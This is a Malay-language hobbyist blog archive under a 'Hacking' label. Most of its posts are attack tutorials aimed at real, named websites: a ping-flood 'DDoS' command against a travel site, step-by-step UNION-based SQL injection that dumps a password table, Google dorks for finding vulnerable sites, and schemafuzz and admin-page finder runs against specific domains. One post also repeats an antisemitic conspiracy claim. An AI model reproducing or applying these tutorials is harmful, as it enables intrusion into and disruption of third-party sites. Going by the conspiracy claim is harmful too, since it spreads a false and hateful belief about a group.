Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Monday, June 16, 2014

Cara Lepasi Malware Pada Sesebuah Website

Cara Lepasi Malware Pada Sesebuah Website

Virus Malware ni ada terdetect jugak kat blog aku.. bile bukak page Software, maka akan keluar page This Website Ahaed Contains Malware. Ahh ~ abaikan je msg tu, bukan ade virus bahaya pun kalau korang teruskan jugak search di KBM.

Bukan aku nak hack korang pun, dosa tau hack-hack nih.. merosakkan harta benta orang lain.. hehe.. biasenye bile detect Malware pada sesebuah website, kadang-kadang ada software yang isinye ada virus.. so bile upload di Hosting, SE akan detect virus.. sebenarnye takde ape pun..

Kadang-kadang boleh jadi script yang kite tanam di blog/website tak boleh diterima Google, so boleh jadi macam ni jugak.. contoh script yang aku tanam kat blog ni pada page Sitemap. Aku dah lupe script tu aku cilok mane, tapi cadangnye nak remove and install the new one la.

Cara Lepasi Malware Pada Sesebuah Website

Bile jadi macam ni, terserah korang nak teruskan ataupun tak, betul jugak risikonye atas yang mengakses.. tapi kalau aku, tengok pada keadaan jugak.. website yang kite xplore tu, kalau nampak semacam, tak payah la.. tapi setakat blog blogger biase.. tarak hal la..

Bile jadi macam ni, mudah je.. klik pada Advance - Proceed At Your Own Risk. Maksudnye segala risiko ditanggung oleh anda.. eleh macam kalau ape-ape risiko Google boleh tanggung? haha.. nak lagi detail, baca la kat Learn More tuh.. penerangan panjang lebar kat situ..

Cara Lepasi Malware Pada Sesebuah Website

Same jugak kalau jadi macam gambar kat atas.. kalau berani nak teruskan, just click Ignore This Warning. Tapi hati-hati.. jangan sebarang klik brader sister, takut-takut ade yang nak pedajai kite.. macam-macam cara orang boleh buat hanya dengan dapat access komputer kite, tambah-tambah user yang suka simpan secret stuff, contoh password maybank2u ect.

Aku cume bagi cara saje.. ape-ape pun be carefull anything what u want to do, exspecially if onair / online.. tu pasal kalau orang pandai boleh buat duit hanya dengan online saje.. takde modal tapi dapat duit. Caranya? macam-macam cara brader.. hahaha ~
Share:

Friday, July 15, 2011

Tutorial Setting Proxy Dan Anonymously

Bagaimana untuk korang masuk ke dalam satu forum yang disekat access penggunaan pada satu Negara tuh? misalnya korang sekarang study kat Indonesia, then korang nak masuk satu forum yang disekat untuk join dalam forum tu? slalunya yang suka sekat-sekat nie Underground forum macam Hacking Center, yang berkaitan dengan kerajaan-kerajaan suatu negara tu, so drang (Malaysia underground forum) tak nak la kalau-kalau ada rakyat Indonesia join forum diorang walaupun korang rakyat Malaysia yang belajar di Negara luar, sebab bila korang kat Negara luar pastu nak searching automatik dia pakai IP atau proxy dari Negara tu sendiri, jadi yang boleh untuk join dalam Malaysia underground forum ni cuma IP yang dari Malaysia jer, IP dari Negara luar disekat, so macam mane?

Cara dia sangat mudah, tapi manfaaatkan jugak kelebihan yang ada pada Search Engine yang sangat banyak kat Internet, tak caya try search google tu " search engine paling popular " atau apa-apa la, pandai-pandai korang la kan, sebenarnya kalau korang tanya Abg google dia dah leh jawap cuma macam-macam jawapan la, Ok kite akan street to da point bagaimana cara untuk setting Proxy AKA menjadikan diri kita ni sebagai Anonymously.

Ada dua cara, first korang bleh masok sini :

Hide My Ass, apa yang ada dalam tu korang tengok-tengok la, then kalau dah boring macam takde apa dalam tuh, boleh try surf di situ, hide my ass adalah semacam search engine yang mana apabila korang menggunakan search engine di situ IP korang tidak akan terdetect, cube try masuk laman yang disekat dengan menggunakan site Hide My Ass ok kan? cuma bagi aku kalau search kat Hide My Ass jadi lambat la, tau la plak connection internet aku kat sini slow macam siput.. tapi memang beza la dengan search biasa-biasa.. try la kalau nak tau.. cara nie memang senang.. ada satu lagi cara yang korang terus jer setting kat proxy korang, yang nie aku suka banding yang hide my ass tadi sebab yang nie praktis sikt, boleh ubah-ubah tergantung dari proxy yang korang letak, so best sikit bagi aku la, korang tak tau lak camner kan?

O.K first :


Open Mozilla korang, tak kira la mozilla atau I.E, mana-mana pun sama jer cuma yang nie pakai mozilla sebab wadud sendiri pon pakai mozilla, I.E kureng suker sikit... mungkin kalau IE ada sikit perbzaan die, tapi tak beza sangat la godek-godek dah buleh jumpa, O.K then korang pegi kat tools pastu option then yang akan kuar macam nie :


O.K arahkan cursor korang pada Advanced button, then Network button, then Setting button, apa yang korang dapat macam nie :


Pada no satu tuh, korang tick kan kat situ untuk kita menggunakan proxy kita, boleh masuk sini untuk free proxy atau untuk yang bagus korang boleh carik sendiri kat google atau I.E, lagi puas hati kalau search sendiri atau tanya mr.google, O.K bila dah dapat proxy yang korang nak, pada no 2 tu korang isi la sendiri, pada setiap proxy mesti ada HTTP proxy dengan port dia, dah siap.. sangat mudah kan? gudluck ^_^

P/S : ni tutorial yang wadud buat lama dah, jadi penulisan agak kacau dan kebanyakkan sume wadud dah ubah, kot-kot ada yang terasa hati, sorry la eh ^_6.
Share:

Saturday, June 18, 2011

Kerajaan tak gentar dengan Hacker Anonymous

Yeke tak gentar? amboi.. hahahahaha.. tapi bagos la, buat ape nak gentar dengan dengan 'mereke' kan? tapi tuh la.. bile pikir balik kadang bagos kalau ada Hacker-Hacker nieh.. tapi kadang pikir drang ni membahayakan keselamatan dunia Internet, huhuhu.. tengok la macam-macam feedback pengguna internet tentang Hacker Anonymous neh, email drang, blog drang dan macam-macam lagi berkaitan dengan dunia Internet.. tuh yang jadik bahaya sampai menyusahkan pengguna internet lain.. korang baca berita kat bawah ni, best.. kerajaan tak gentar.. hehehehe..

Zass kat bawah :


Rais: Kerajaan tak gentar dengan 'Anonymous'

Jun 18, 11 3:29pm

Kerajaan tidak gentar dengan ancaman kumpulan penggodam yang menyerang 198 laman web tempatan termasuk portal rasmi kerajaan sejak lima hari lalu, kata Menteri Penerangan Komunikasi dan Kebudayaan Datuk Seri Rais Yatim.


Katanya Malaysia sebagai negara berdemokrasi mempunyai undang-undang untuk menghukum mereka yang melakukan perbuatan itu.

Beliau memberi jaminan siasatan serangan oleh kumpulan penggodam yang bergelar 'Anonymous' itu akan diketahui dalam masa terdekat selepas pihak yang berkaitan mengenalpasti mereka yang terbabit dalam kejadian itu.

"Dalam perkiraan kita, mereka tidak menang dan kita tidak perlu takut kepada gertak dari dalaman mahupun luar tanah air," katanya kepada pemberita selepas memulakan perlawanan persahabatan badminton antara pasukannya, D'sury mementang Kraftangan Malaysia di Institut Kraf Negara di Rawang, hari ini.

Menurutnya, serangan penggodam itu tidak merebak dengan meluas kerana hanya sebahagian laman web rasmi kerajaan mahupun swasta mengalami kerosakan dan tidak mengakibatkan kelumpuhan terhadap keseluruhan sistem laman web yang digodam.

- Bernama

Tadi wadud ada bincang dengan kengkawan pasal Hacker Anonymous ni la.. bila kita pikir balik, ape la nak dibanggakan dengan Hacking-hacking neh.. cube pikir balik, sape yang menciptakan dunia Internet ne? Yahudi kan? so sape pulak yang menciptakan teknik-teknik Hacking? Yahudi jugak.. jadi.. ape lah sangat dengan security website kerajaan Malaysia ney.. example kan, satu barang yang korang ciptakan sendiri, dah pasti segala selok belok ciptaan tu kroang tau sepenuhnye kan? yaps.. begitu jugak dengan Yahudi tadi.. heheheh.. bukan nak meremahkan budak-budak Hacker Malaysia, tapi berhati-hatilah dengan agenda-agenda tersembunyi puak Yahudi, tu jer.. ^_^

Eh wadud ada baca tentang beberapa blog yang bakal di Hacked.. huhuhu.. ni yang bengang nieh.. nak tengok gak? USHA SINI.
Share:

Friday, June 17, 2011

Ddos Website. Hacking Tutorial.


Lame dah tak update pasal hacking.. hikhikhik.. ternyata masih ada sifat jahat dalam diriku.. ekekekke... bukan, ni just nak kongsi2 jer.. yang lain terserah korang nak buat ape kan.. pasal tutorial SQLi tu pon tak siap lagi.. nanti2 la wadud kasi yang full ok..

Hehehe.. so rini saje rajin, nak buat lak pasal DDOS website orang? pergh macam best siot.. step dia sangat mudah.. korang jangan wat kat orang lain tau.. sian drang.. untuk tau kelebihan DDOS ni, sila search kat google ea, jangan malas2.. tak pon try DDOS kat web korang..pastu tengok ape jadi ok?? :D


First skali, buka CMD korang >> Start >> CMD. Nanti akan muncul kotak hitam..


Pastu, taip kat dalam CMD macam ni >> ping website target -t -l 5000 >> enter. Contoh macam ni ping www.russia-travel.com -t -l 5000. 5000 tu sebagai bebanan DOS yang kita hantar pada web tuh.. nampak kan? ok kalau failed, korang boleh cancel, cara dia tekan crtl+c secara bersamaan. So.. kurangkan jumlah dari 5000 kepada 1000.


Tengok.. dah berhasil.. so untuk tengok effect dia, korang leh try masuk web yang dah DDOS tadi.. try bukak tengok.. ehehehhee.. so sekian dari newbie yang ngade2 ni.. ekekeke..
Share:

Tuesday, June 14, 2011

Hacker Anonymous Malaysia.


Korang baca tajuk jer macam wadud lak golongan dari Hacker Anonymous neh.. hahaha.. agak2 la beb.. kalau wadud dari golongan drang pon takkan la nak sebar2kan kat sini pulak.. musti la private ma.. tutor2 hacking yang penah wadud buat dulu sume tuh dah lapok.. dah tak gune lagik trik2 maca tuh.. hehehe.. nama pon Hacker Anonymous gelaran dunia tuh..

Hacker Anonymous Malaysia? wow jangan korang tak tau.. berkemungkinan besar web http://www.malaysia.gov.my/ akan di hack oleh Hacker Anonymous gang.. nama pon Anonymous, mesti la privacy habes data2 drang. Tapi kengkadang pikir baik jugak drang hack web tuh *err* sebab korang sendiri tahu macam mana pemerintahan di Malaysia skrang.. sebelum naik jadi PM macam2 heboh nak tu la ni la.. realiti dia macam skrang la.. hahahaha.. lain orang lain pandangan ^_^

Ada juga wadud baca info berkenaan dengan segelintir dari gang Hacker Anonymous di Spanyol pada Jumat (10/6) atas tuduhan melakukan serangan Cyber hacking. Salah seorang dari yang telah ditangkap tidak sempat utuk menenggelamkan segala aktiviti private group tersebut sehingga sebuah komputer disita dan dipercayai digunakan selama kegiatan mereka. Mereka juga menggunakan sebuah Web software Loic sebagai alternatif semasa melakukan kegiatan mereka.

Nama jer dunia maya mana nak pernah bebas bro.. kalau real world pon dah tak bebas ni kan dunia maya? hurm.. sebab setiap sesuatu yang dicipta macam software2, mesti ada kelemahan atau lubang dari software tersebut.. dan itu diketahui oleh si pembuatnya. Hacker ni la yang dok carik2 lubang tersebut untuk menjayakan operasi mereka.. hahahaha.. macam-macam..
Share:

Saturday, June 11, 2011

SQLi part III Manual Tutorial.

Tutorial sambungan dari SINI.


6. Untuk dapatkan column, gunakan perintah "group_concat(column_name)" pada no yang keluar tadi dan perintah "+from+information_schema.columns+where+table_name=0xhexa--" di hujung no. Contoh :

asal : http://bla2.com/artikel/news.php?id=-191+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

ubah : http://bla2.com/artikel/news.php?id=-191+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xhexa--

Cuba lihat dihujung ada perintah "0xhexa" itu bermaksud kita perlu convert kan adalah table2 yang korang anggap penting, Contoh wadud convert table "cms_password " dan hasilnya "636D735F70617373776F7264" keluar beberapa jumlah nombor. Itulah yang perlu kita letakkan setelah perintah 0x636D735F70617373776F7264-- Contoh :

http://bla2.com/artikel/news.php?id=-191+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x636D735F70617373776F7264--


7. Cara convert korang kene masuk kat beberapa web di bawah ini, tapi kalau satu web korang dah puas, teruskan :

http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/



Hasil convert table "cms_password " adalah "636D735F70617373776F7264" jadi korang dah paham? bagus.. ^_^


8. Ok sekarang gunakan perintah "concat_ws(0x3a,hasil isi column yg nak dikeluarkan)" dan "2+from+nama table yang di hexa tadi--" dah nak siap.. teliti betul2. :

http://bla2.com/artikel/news.php?id=-191+union+select+1,2,concat_ws(0x3a,cms_password_id,cms_password_ip_address,cms_password_username,cms_password_password,cms_password_last_date),4,5,6,7,8,9+from+cms_password --



Setelah gunakan perintah diatas, hasil yang wadud dapat adalah : 1:203.130.254.122:miwon:miwon

So.. korang dah berjaya dapatkan info2 penting dari website dia, dan terserah korang nak buat ape.. ekekeke.. pikir dengan baik.. pikir positif (huh) rasanya tak penin kan? (hahahahahaha) wadud sendirik pon penin.. mungkin sebab dah biasa, so nombor2 tu tak buatkan wadud penin sangat.. korang? gudluck ^_^.
Share:

Friday, June 10, 2011

SQLi part II Manual Tutorial.

Harini nak tulis pulak pasal hacking.. hehehe.. sambungan dari manual SQLi ingat lagi tak? SINI beleh klik pada link tuh.. ni sebenarny just tutor jer ok.. kalau betul korang nak buat.. huhuhuhu.. tak payah la, sekadar tahu sudah la ea? hehehehe..

Kite street jer ok.. satu lagi nak bagitahu.. step2 ni just sampai pada kita dapat tahu table2 dia dan column dia.. tapi tak semua betul dari ape yang dah kita buat, memang benda ni susah dan perlukan kesabaran serta ketelitian (amboi).. tapi bile korang perati betol2 memang tak susah dah, mende ni wadud praktek nak dekat setaun.. dan jugak, pada yang dah pro.. sila la tinggalkan bagi yang lebih memerlukan.. ^_^

Kalau korang dah refer pada link SINI dan korang boleh paham dari situ.. insyaallah step2 lepas ni lagi mudah sebab wadud dah sertakan gambar sekali.. lagipun dulu time dok praktek2 ni.. tutor yang wadud baca mana penah ada gambar.. paling2 link dari site target jer drang tunjukkan..

Ok lepas kita dah jumpa site yang vuln teruskan dengan step2 mudah di bawah ni, ingat ketelitian korang sangat2 diperlukan :  (view gamba untuk besau)




1. Target kita : http://bla2.com/artikel/news.php?id=-19+order+by+9--

ps >> maaf target sebenar harus ditutup sebab untuk menjaga privasi orang lain.. ni kan just nak tahu jer.. hehehe.. tak baek la korang.. untuk penjelasan gambar diatas, site asal dia http://bla2.com/artikel/news.php?id=19 ok? yang diperlukan kat sini adalah kita perlu cari error untuk dapat acess order by, cara dia :

Lepas dapat error dari site tu dengan penambahan "- atau ' " http://bla2.com/artikel/news.php?id=-19+order+by+1-- dan seterusnya +order+by+2,3,4,5,6,7,8,9,10-- (buat satu2 bukan berderet macam tu) contoh :

-19+order+by+1--
-19+order+by+2--
-19+order+by+3-- dan seterusnya..

Buat sampai keluar error ok.. dan error yang keluar itulah untuk kita teruskan lagi misi kita (ekekeke).




2. Ok sekarang kita nak keluarkan angka dari error yang dah kita dapat tadi.. contoh error no 10 so kita amik nombor sebelum error jadi no 9. Buat perubahan atau gunakan perintah "+order+by+" kepada "+union+all+select". Contohnya macam ni :

asal : http://bla2.com/artikel/news.php?id=-19+order+by+9--

ubah : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,3,4,5,6,7,8,9-- (tengok ada perubahan)

Lepas kita dah buat perubahan @ gunakan perintah tadi, tengok pada nombor yang keluar.. contoh dari yang wadud buat keluar no "3" dengan "8" pilih jer mana2 dari kedua tuh dari (+1,2,3,4,5,6,7,8,9--) jadi wadud amik no "3". (mark no 3) dan "8" pon boleh, terserah korang. No ni kita guna untuk tengok version dari web dia.. kalau 5 comunity (contoh) itu mudah, tapi kalau 4 kita kene guna schemafuzz tool la.. tu agak payah sikit..




3. lepas dah mark no 3, kita ubah no "3" menjadi "version()" untuk mendapatkan version dari web dia, macam penjelasan kat atas tadi. Contoh dari perubahan atau gunakan perintah "version()" kepada nombor "3" :

asal : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,3,4,5,6,7,8,9--

ubah : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,version(),4,5,6,7,8,9-- (lihat mana yang ubah dan mana yang tidak)

Ok dari ape yang dah wadud dapatkan, web dia guna "5.0.51a-24+lenny5" ertinye version 5 bukan 4. So berita baik kita boleh teruskan lagi.. hehehe.. sebab kalau 4 susah nak jelaskan, guna schemafuzz lagi..





4.Ok sekarang kita nak keluarkan table dari web dia, gunakan code atau perintah table_name (pada nombor keluar) dan "+from+information_schema.tables--" (letakkan setelah nombor 9) relax jangan penin.. contoh dia macam ni :

asal : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,version(),4,5,6,7,8,9--

ubah : http://bla2.com/artikel/news.php?id=-19+table_name+1,2,version(),4,5,6,7,8,9+from+information_schema.tables--

So table yang keluar adalah character_sets (tengok gambar), jadi untuk keluarkan semua table kita kene gunakan perintah "group_concat(table_name)" dan "+from+information_schema.tables+where+table_schema=database()--"





5. Mana kita nak letak code2 tu? ok tengok contoh :

asal : http://bla2.com/artikel/news.php?id=-19+table_name+1,2,version(),4,5,6,7,8,9+from+information_schema.tables--

ubah : http://bla2.com/artikel/news.php?id=-19+group_concat(table_name)+1,2,version(),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


Jadi table akan keluar lebih dari satu.. tengok elok2, sebab dari table lah kita dapatkan info-info penting dari web dia, contoh table yang keluar lepas wadud buat "cms_password, content,content_bigfoto, content_kat, miwon_menu" table yang rasa penting korang boleh tengok sendiri, macam password, admin, login dan sebagainya tergantung pada table yang korang dapat. Rasa tak perlu kot sampai semua korang geladah.. buang masa jer.. baik pakai table yang betol2 korang rasa oh kat sini mesti ada pasword dia.. tapi kalau korang dah rajin sangat.. go on la.. ^_^

Okeh.. dah penin rasa... sambung nanti pulak la ekh.. sebab lepas ni kita kene convert pulak setiap table yang kita rasa penting, kalau korang dah lepas sampai ke tahap ni.. kira ok dah.. ^_^ da boleh la nak dapat info2 penting dia.. tapi ingat, ni hanya untuk ilmu jer, bagi kotang lebih tahu.. hehehehe... kalau nanti wadud rajin, boleh la wat tutor menggunakan schemafuzz tool pulak la ea.. lagi best, korang just tunggu dan tunggu dah dapat.. tapi nak paham bagi la xpert sikit tutor manual ni, baru betol.. *_*
Share:

Wednesday, May 25, 2011

[harakahdaily.net]Hina Islam: Abim gesa ambil tindakan tegas.


sekadar gambar hiasan

KUALA LUMPUR, 26 Mei: Angkatan Belia Islam Malaysia (Abim) memandang serius kewujudan laman web dan blog yang menghina imej serta kesucian agama Islam.

Dalam kes ini, Abim merujuk kepada penyebaran beberapa bahan penulisan dalam blog dengan panggilan Makcik hajjah, dan laman Facebook menggunakan nama 'Makcik Hajjah Sitt Al Wuzara'.

Setiausaha agungnya, Mohamad Raimi Ab Rahim berkata, berdasarkan daripada keterangan yang diterima serta penyelidikannya, bahan-bahan yang dimuatkan dalam blog terbabit jelas menggambarkan niat jahat dan provokasi penulis blog tersebut.

“Tindakan ini amat dikesali dan jelas-jelas telah menimbulkan kemarahan umat Islam,” ujarnya dalam satu kenyataan.

Justeru, Abim beserta Persatuan Kebangsaan Pelajar Islam Malaysia (PKPIM) telah mengajukan laporan polis di Balai Dang Wangi.

Menilai daripada itu, katanya Abim menuntut agar pihak Suruhanjaya Komunikasi Multimedia, Jabatan Kemajuan Islam Malaysia, Polis Diraja Malaysia dan Kementerian Dalam Negeri serta pihak berwajib segera menyiasat secara terperinci insiden yang sangat mendukacitakan ini.

Katanya, Abim menuntut agar dakwaan dan tindakan tegas dikenakan terhadap beliau dan mana-mana pihak yang bersubahat.

“Abim juga dengan ini mendesak agar pemohonan maaf dikeluarkan secara rasmi dan terbuka oleh beliau terhadap seluruh umat Islam,” ujarnya.

Abim, tambahnya mengambil kesempatan ini untuk menyeru mana-mana pihak agar tidak menyalahgunakan kebebasan ruang maya untuk menghina agama Islam.

“Sebagai agama Persekutuan, kesucian dan kehormatan Islam haruslah dipertahankan dari sebarang unsur-unsur atau usaha untuk mencemarkannya,” ujarnya.

PS : Korang nak tengok ke blog dia? jap lagi wadud post dan koreksi mana2 yang boleh.. ikut pada kecetekan ilmu ni la.. korang pon boleh baca sendiri.. tapi ingat, dalam blog dia, macam2 provokasi yang dibuat atas alasan2 tertentu..khusus untuk ummat Islam.. kalau korang baca.. komperem bengang, panas, rasa nak hayun, nak tikam sikit2, nak carik2 kulit, nak siat2 dan macam2 lagi.. memang tu tujuan si penulis.. jap lagi wadud post.. amik satu artikel kemudian kita koreksi sama2.. korang jugak disarankan agar meletakkan persepsi masing2.. kita sharing untuk jatuhkan suspek tersebut, wawawawa.. suspek pulak.. sebab, berkemungkinan suspek adalah orang yang mempunyai populariti yang tinggi, sape tau? sampai skang ok jer? budak2 hacker pon senyap.. lagipon, memang susah nak jahanamkan blog tersebut.. tapi tu lah, kita gunakan akal sihat ni untuk jerumuskan suspek tu kepada kebaiakan.. moga2 dia berubah, sesal dengan perbuatan dia.. amin..
Share:

Monday, November 29, 2010

Tutor mencari Vuln Site secara manual ~ SQL-i Basic ~

Setengah orang kan.. kalau buat tutorial SQL-Injection mesti full kan? hehe.. kali neh wadud nak gak tutorial SQL-I.. tapi yang betol2 basic dan mengikut tahapan.. sebelum ne wadud ada tunjukkan cara untuk dapatkan link yang ada lobang@Vuln site dengan gunakan CMD.. Usha Sini.

So kali ni wadud nak wat secara manual.. yela.. dulu masa berjinak2 dalam dunia hacking neh, mende yang pertama ni la yang wadud tak paham.. hoho.. tension sungguh, mmm.. untuk mengukuhkan lagi ilmu yang dah lama wadud tinggalkan tuh.. wat la tutorial, tapi ni sekadar berkongsi ok.. hehe.. jangan kata wadud ngajar mende yang criminal?? waaa..

Sebenarnya.. nak carik site yang vuln bukan susah.. cume kita kene lebih bagi perhatian dan banyakkan bersabar.. yela nama pon manual kan? hehe.. mana ada manual yang relax2 jer leh dapat? kene ada usaha la kan? =)


Tutor mencari Vuln Site secara manual ~ SQL-i Basic ~

1. KOrang taip keyword neh kat google atau ape2 jenis browser yang korang guna sekarang.. " allinurl:news.php?newsid= " tanpa tanda kurung..

-- allinurl:news.php?newsid=




Yang akan kuar cenggitu, hah.. banyakkan site2 kat bawah tuh? tapi x semuanya Vuln, dan x semuanya korang leh hack cenggitu2 jer.. ni baru basic.. hehe.. mantapkan dulu basic baru leh jadi power.. =)

Untuk pengetahuan korang, korang leh ubah jer ikut cara korang pada " allinurl:news.php?newsid= ", misalnya korang ubah jadik cenggini " allinurl:artikel.php?id= " dan keputusannya beza dan lain dari yang pertama tadi.. 

-- allinurl:news.php?newsid= <-- yang asli.

-- allinurl:artikel.php?id= <-- citarasa sendiri. 

2. Sekarang dah tau camne cara nak cari Vuln site, tapi belum sepenuhnya dapat, okeh.. untuk tau apakah satu2 site tu vuln ke dak.. letakkan simbol " ' " kat hujung site target kita.. 




Misalnya wadud amik site neh sebagai contoh.. " http://www.cine.se/Artikel.php?id=137 " dan kita letakkan simbol " ' " kat hujung site tadi, jadi macam ne.. " http://www.cine.se/Artikel.php?id=137' " nampak kan ada simbol " ' " kat hujung site tuh?
 

-- http://www.cine.se/Artikel.php?id=137 <-- yang asli.

--  http://www.cine.se/Artikel.php?id=137' <-- hujung diletakkan dengan simbol " ' ".


Tapi korang xleh suka2 jer dapat terus yang vuln, dan x semestinya lepas letak simbol " ' " kat hujung site tuh boleh dapat cenggitu2 jer..




Untuk tau ada site yang vuln, dia ada tulis cenggini..

-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\inetpub\wwwroot\ajpower.net\html\News.php on line 249

or


-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6 AND Publish='1'' at line 1

Tengok screenshot yang wadud dah snap dan merahkan kat atas tuh.. hah.. ada kan error dia? yes dah dapat satu target.. hehe.. senang jer kan? x susah hack2 neh.. cuma memerlukan sedikit ketelitian dan kepakaran jerk..=p wadud x pakar, newbie  yang belagak pandai jer, ekekeke.. so.. try la okeh.. gudluCk aLl..

-- http://www.cine.se/Artikel.php?id=137 <-- yang asli. 

-- http://www.cine.se/Artikel.php?id=137' <-- hujungnya diletakkan simbol " ' ".

-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\inetpub\wwwroot\ajpower.net\html\News.php on line 249

atau.

-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6 AND Publish='1'' at line 1
Share:

Monday, November 22, 2010

Run Scripts guna CMD -Perl, PHP, Phyton-

Salam allz.. hehe.. lame dah x berblog.. yela final dah dekat.. so terpaksa la buat2 busy.. :p lagipun admin tersayang wadud (kak Asyi) ada lagi, dia la yang amik alih update2 blog neh.. hehehe.. sungguh baik kak Asyi.. kengkawan.. sory sangat2 wadud tak leh sangat dah berblog.. tunggu btol2 free baru leh on balik.. heee.. nanti x pasal2 kene sound ngan kak Asyi.. adoi.. kompom x leh tido malam sebab teringat jerk.. hahahaha..

Cume, wadud teringat nak  update sikit jer, pasal HACKING.. ekekeke.. boring2.. tulis jela, nak bukak buku.. adoi.. rasa penin, so ubat dia tulis jer ape2 kat blog.. memang ubat yang mujarab btol.. hehehe.. jadi, boring punya pasal, wadud buat tutor yang sangat2 simple dan asas.. yela untuk flashback balik ilmu wadud, sambil sharing2.. hehehe.. untuk melihat tutor tersebut, tertera di bawah ini.. enjoy.. =)


@@@@Asas menggunakan ActivePerl pada CMD.@@@@





1. Pertama install ActivePerl. Download ActivePerl

2. Kedua letak file find.pl dekat C:/find.pl. Download PerlScripts

3. Ketiga bukak CMD taip : cd c:/

4. Keempat taip pula : c:/find.pl

5. Kelima taip perl find.pl http://www.archdioceseofcolombo.com/



@@@@Asas menggunakan PHP pada CMD.@@@@





1. Pertama install PHP. Download PHP.

2. Kedua letakkan scripts find.php pada local C. Download PHPscripts.

3. ketiga taip cd c:\program files\php

4. Keempat taip php.exe c:\find.php inurl:news.php?id= <-- tengok screenshot. 

5. Tunggu dan lihat hasilnya. <-- tengok screenshot. 



@@@@Asas menggunakan pyhton2.6 pada CMD.@@@@ 







1. Pertama install phyton 2.6. Download Phyton 2.6.

2. Kedua letakkan scripts schemafuzz.py di local C. Download phytonScripts.

3. Ketiga run CMD, taip CMD pada kotak search di START.

4. Keempat taip cd c:\ <-- enter 

5. Kelima taip schemafuzz.py <-- enter 

6. Keenam taip C:\schemafuzz.py --dbs -u "http://www.agscompany.com/news.php?id=-50 union all select 1,2,darkc0de,4,5--" 

7. Ketujuh, sekadar sharing.. =)



Extract dengan menggunakan 7zip atau Winrar untuk membuka File yang telah korang download tadi.

-- Untuk yang takde 7zip software, download SINI.

-- Untuk yang takde WInrar software, download SINI.
 

 Password rar : http://slumberblogger-freedownload.blogspot.com
Mediafire Password : kehidupanbloggermalaysia

Attension!! untuk download dengan lengkap software2 tersebut, sila SKIP ADS pada page pertama yang keluar.
Share:

Thursday, October 7, 2010

Used Cmd To Find Admin Login Page

Yeahhh.. sebagai janji, rini wadud nak kongsi pada semua orang, terutama para blogger yang mengenali diri ini.. hehe.. kongsi ape ekh?


Emm.. pasal hari tu ada janji nak buat tutor mengenai cara2 untuk dapatkan admin page menggunakan scripts.. hehehe.. manfaatkan Command Prompt.


OKeh.. street to da point..


First, wajib untuk korang download scripts ni.. - Thanks 2 darkc0de -


1.74 KB

Hotfile


Second, wajib gak download Phyton version 2.5 software.


17.85 MB

Wareseeker



Haa.. dah download semua tuh, skang part2 yang penting untuk kita usha baek2.. kalau tak.. kang tak menjadik.. :-) biar letih sekali, dapat ape yang kita nak.. :-)


1.) Carik target korang.. wadud ada buat tutor untuk carik target yang " sesuai ".. hehe.. refer kat SIni.


2.) Save scripts a.py dalam file admin.rar dalam C:\.


3.) BUka Command Prompt / CMD korang.. cara dia.. Start >> Run >> CMD. Maka akan keluar kotak hitam. Rasa2 dah tau kan?


4.) Then, taip pada CMD korang " cd c:\ " --> enter --> taip lagi " a.py " then enter. Usha screenShot kat bawah neh. ( tanpa tanda kurung )



- Klik Untuk Membesar -



5.) Kemudian, akan keluar macam ScreenShot kat bawah neh.. ok, taip pulak " a.py URL target kita " kemudian enter. Target yang wadud guna ni " http://www.neuroscience-cognition.org/ ", jadi tulisan tu akan jadi cenggini " a.py http://www.neuroscience-cognition.org/ " kemudian enter. ( tanpa tanda kurung )



- Klik Untuk Membesar -



6.) Dah lepas tahap ke lima, korang dah di kira suksess.. heheh.. sebab memang dah berjaya dah, terer2.. korang memang terer.. :-) ok.. yang ni, korang hanya tunggu sampi keluar yang " 200 ok " bukan " Not Found ".



- Klik Untuk Membesar -



Okeh.. dah settle.. korang memang da best.. hehehe.. ape2 pown, wadud ucapkan time kasih sebab dah baca.. dan praktikkan bagi yang mahu.. hehehe.. :-)


Ilmu bukan wadud yang punya.. korang jangan wat jahat lak, ekekeke..
Share:

Monday, October 4, 2010

Find Admin LOgin Page With Reiluke Software.

Salam all.. hehehe.. bersua lagi kita kan? hari tuh wadud ada update pasala SQL-i kan? hehehe.. untuk mengetahui apakah itu SQL boleh lihat di sini.., sini pon bleh.. :-)


Nanti dah tengok, jangan kata wadud jahat ok, sebab kan wadud dah kata, wadud cuma berkongsi maklumat, ilmu yang wadud ada.. wadud rasa menda macam ni korang kene amik tau sikit pon jadilah..


Nanti kalau ada apa2 yang nerkaitan, korang dah tau.. oh mende ni ke.. walaupun mende ni macam tak de manfaat langsung..hehehe :-)



OK, tak nak bahas panjang2.. :-) rini wadud nak kongsi ngan kawan2 sume macam mana kita nak carik Admin LOgin Page.. sungguh mudah dan mudah.. :-)


Kali ni wadud tunjuk cara untuk cari Admin Login Page dengan menggunakan software, nanti ada masa lagi wadud akan tunjuk dengan menggunakan scripts lak ok :-)


OKeh, download software ni bawah ni..



Reiluke Software - 07 MB -


Screen Shot tertera di bawah ini..




- Klik Untuk Membesar -


OKeh, camne nak guna mendalah ni? nampak kan LINK " http://victim.com/startdirectory/ ".. korang padam LINK yang tuh dan letakkan LINK website yang korang nak carik Login PAge dia ok.. insyaallah jumpa.. ^_^


1.) OK.. pada Target kita akan cuba site ini " http://www.sinatrafamily.com/ "

2.) Result boleh dilihat pada DIrectory " http://www.sinatrafamily.com/admin/ "

3.) Tapi tu forbidden, kite nak yang OK.. so masih boleh lihat software tu scan banyak lagi Admin Login Page. Boleh lihat pada Trying.




- Klik Untuk Membesar -


